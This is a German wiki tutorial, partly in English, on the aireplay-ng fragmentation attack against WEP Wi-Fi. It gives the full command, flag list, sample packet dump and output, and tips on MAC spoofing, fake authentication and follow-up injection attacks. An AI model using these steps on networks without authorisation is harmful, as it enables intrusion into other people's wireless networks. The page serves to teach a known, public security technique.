Fragmentation Angriff

Aus Wardriving-Forum.de Enzyklopädie

Wechseln zu: Navigation, Suche

Inhaltsverzeichnis

[Bearbeiten] Fragmentation Angriff
[Bearbeiten] Beschreibung

Bei einer Fragmentation Attack geht es darum, den 1500 bytes des PRGA (pseudo random generation algorithm) zu erhalten. Damit kann man zwar nicht direkt den WEP errechnen, ist aber bestens dafür geeignet Pakete zu generieren die man für zahlreiche Injection-Angriffe benutzen kann. Es genügt schon ein empfangenes Paket vom Accesspoint um den Angriff einzuleiten.

Basically, the program obtains a small amount of keying material from the packet then attempts to send ARP and/or LLC packets with known content to the access point (AP). If the packet is successfully echoed back by the AP then a larger amount of keying information can be obtained from the returned packet. This cycle is repeated several times until 1500 bytes of PRGA are obtained or sometimes less then 1500 bytes.

The original paper, [Fragmentation Attack in Practice], by Andrea Bittau provides a much more detailed technical description of the technique. A local copy is located [[1]]. Here are [slides] of a related paper. A local copy of the slides is located [[2]]. Also see the paper "The Final Nail in WEP's Coffin" on this page.

[Bearbeiten] Befehl 
  aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D ath0


Erklärung: 

 *-5 means run the fragmentation attack
 *-b 00:14:6C:7E:40:80 is access point MAC address
 *-h 00:0F:B5:AB:CB:9D is source MAC address of the packets to be injected
 *ath0 is the interface name

Optionale Filter: 

 *-b bssid  : MAC address, Access Point
 *-d dmac   : MAC address, Destination
 *-s smac   : MAC address, Source
 *-m len    : minimum packet length
 *-n len    : maximum packet length
 *-u type   : frame control, type    field
 *-v subt   : frame control, subtype field
 *-t tods   : frame control, To      DS bit
 *-f fromds : frame control, From    DS bit
 *-w iswep  : frame control, WEP     bit

Optionale Replay Optionen: 

 *-k IP     : set destination IP in fragments - defaults to 255.255.255.255
 *-l IP     : set source IP in fragments - defaults to 255.255.255.255
[Bearbeiten] Usage Example

Du startest die Atacke mit dem Folgenden Kommando und wähls dann das Paket aus, dass du haben willst: 

 aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D ath0
 
 Waiting for a data packet...
 Read 96 packets...
 
       Size: 120, FromDS: 1, ToDS: 0 (WEP)
 
            BSSID  =  00:14:6C:7E:40:80
        Dest. MAC  =  00:0F:B5:AB:CB:9D
       Source MAC  =  00:D0:CF:03:34:8C
 
       0x0000:  0842 0201 000f b5ab cb9d 0014 6c7e 4080  .B..........l~@.
       0x0010:  00d0 cf03 348c e0d2 4001 0000 2b62 7a01  ....4...@...+bz.
       0x0020:  6d6d b1e0 92a8 039b ca6f cecb 5364 6e16  mm.......o..Sdn.
       0x0030:  a21d 2a70 49cf eef8 f9b9 279c 9020 30c4  ..*pI.....'.. 0.
       0x0040:  7013 f7f3 5953 1234 5727 146c eeaa a594  p...YS.4W'.l....
       0x0050:  fd55 66a2 030f 472d 2682 3957 8429 9ca5  .Uf...G-&.9W.)..
       0x0060:  517f 1544 bd82 ad77 fe9a cd99 a43c 52a1  Q.D...w.....<R.
       0x0070:  0505 933f af2f 740e                      ...?./t.
 
  Use this packet ? y

Das Programm antwortet (oder ähnlich): 

  Saving chosen packet in replay_src-0124-161120.cap
  Data packet found!
  Sending fragmented packet
  Got RELAYED packet!!
  Thats our ARP packet!
  Trying to get 384 bytes of a keystream
  Got RELAYED packet!!
  Thats our ARP packet!
  Trying to get 1500 bytes of a keystream
  Got RELAYED packet!!
  Thats our ARP packet!
  Saving keystream in fragment-0124-161129.xor
  Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Nun hast du ein PRGA-Paket, dass du mit packetforge-ng benutzen kannst, um damit andere Attacken auszuführen.

[Bearbeiten] Tipps 
 *Die Quell - MAC Adresse muss am AP authentifiziert sein. Um dies zu tun, kannst du fake authentication verwenden, oder die MAC eines bereits angemeldeten AccessPoints verwende.

 *Für madwifi-ng Treiber (Atheros Chipsatz)musst du deine MAC -Adresse ändern.  Wie du dies machst, kannst du in diesem Artikel erfahren. FAQ 

 * Der AP muss viele Pakete senden.   Wenn eines der Pakete verloren geht, wird die Attacke nicht funktionieren.  Dies meint, dass du eine gute Signalstärke- und Qualität haben solltest, sodass keine Pakete verloren gehen.

 * Die Tutorial-Seite beinhaltet einige deutsche Tutorials, die die Fragmentation-Attacke benutzen. Hier kann man noch mehr über diese Attacke und die verwendeten Befehle lernen.

 * Wann solltest du ein Paket ablehnen? Du solltest ein Paket dann ablehnen, wenn es kürzer als das zu einspeisende Paket ist.
[Bearbeiten] Troubleshooting 
 * Stelle sicher, dass deine Karte richtig eingesteckt ist.  Benutze den Injection Test um sicher zustellen, dass deine Karte Injection unterstützt.
 * Stelle sicher, dass der AP deine MAC erlaubt.
 * Stelle sicher, dass du auf dem selben Kanal bist, wie der AP.
 * Und schaue dir die allgemeine Hilfe von aireplay-ng: Aireplay-ng Troubleshooting.

Noch ein Tip, falls der Fragmentation Angriff nicht funktioniert. Es gibt noch andere Angriffe, die du ausprobieren solltest. 

 * Korek chopchop Angriff: Dies ist eine weitere Technik, um PRGA-Pakete für die Injection zu erstellen.
 * -p 0841 Methode: This technique allows you to reinject any data packet received from the access point and generate IVs.
Von „http://www.wardriving-forum.de/wiki/Fragmentation_Angriff